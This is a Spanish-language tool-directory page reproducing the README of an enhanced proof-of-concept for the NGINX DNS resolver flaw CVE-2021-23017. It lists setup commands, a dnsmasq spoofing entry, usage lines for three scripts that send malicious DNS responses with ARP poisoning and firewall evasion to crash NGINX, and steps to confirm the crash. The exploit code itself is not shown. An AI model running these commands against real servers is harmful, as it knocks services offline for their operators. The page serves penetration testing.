Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
EVIL-CVE-2021-23017-Update-2025 — vulnerabilidad en servidores NGINX (versiones 0.6.18–1.20.0). Los scripts buscan causar una Denegación de Servicio (DoS) enviando respuestas DNS maliciosas, con mejoras para evadir firewalls. | Kitploit
Herramientas/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónAnálisis de DNS
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

vulnerabilidad en servidores NGINX (versiones 0.6.18–1.20.0). Los scripts buscan causar una Denegación de Servicio (DoS) enviando respuestas DNS maliciosas, con mejoras para evadir firewalls.

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

vulnerabilidad en servidores NGINX (versiones 0.6.18–1.20.0). Los scripts tienen como objetivo causar una Denegación de Servicio (DoS) mediante el envío de respuestas DNS maliciosas, con mejoras para evadir firewalls. Esta es una versión mejorada del PoC original de M507/CVE-2021-23017-PoC.

Advertencia: Use solo con permiso explícito por escrito del propietario del sistema. Las pruebas no autorizadas son ilegales.

Requisitos

  • Entorno: Linux (por ejemplo, Kali Linux, mediante Termux/configuración virtualizada).
  • Dependencias:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • Red: Misma subred que el objetivo para el envenenamiento ARP, o el NGINX objetivo debe usar la IP de tu servidor DNS.

Instalación

  1. Clona el repositorio:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. Configura dnsmasq:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    Añade: Inicia:
root@kitploit:~
address=/test.example.com/192.168.1.100
root@kitploit:~
sudo systemctl start dnsmasq

Qué Hace

  • Envía respuestas DNS maliciosas con un nombre de dominio largo (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) para bloquear el servidor NGINX.
  • Activa consultas DNS usando curl y dig para explotar la vulnerabilidad.
  • Evita firewalls enviando paquetes DNS directos y usando procesos paralelos.

Diferencias con el Original

En comparación con M507/CVE-2021-23017-PoC:

  • Evasión de firewall mejorada: Utiliza procesos paralelos en poc1.2.3.py para sniffing simultáneo, envío de DNS y disparo de consultas, debes ejecutar los tres juntos.
  • Entrega de paquetes optimizada: Mayor frecuencia de paquetes y consultas para eludir filtros de firewall.
  • Verificación de subred: Comprueba la compatibilidad de red para el envenenamiento ARP, mejorando la fiabilidad.

Uso

Ejecuta los tres juntos y ejecuta con los argumentos apropiados (reemplaza <target_ip>, <your_dns_server_ip>, <target_url>).

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Sniffea y responde a consultas DNS.

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Añade envío directo de DNS y disparo de consultas.

poc3.py (Recomendado)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • Ejecuta tareas en paralelo para máxima eficiencia.

Ejemplo

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

Verificar Resultados

  • Comprueba el estado del servidor:

    root@kitploit:~
    curl -I http://<target_url>
    
    • Éxito: 502 Bad Gateway o 503 Service Unavailable indica un bloqueo del servidor.
    • Fallo: 200 OK sugiere que no hay vulnerabilidad o que el firewall está bloqueando.
  • Monitorea el tráfico DNS:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

Descargo de responsabilidad: Solo con fines educativos. Los autores no son responsables del mal uso.

Descargar herramienta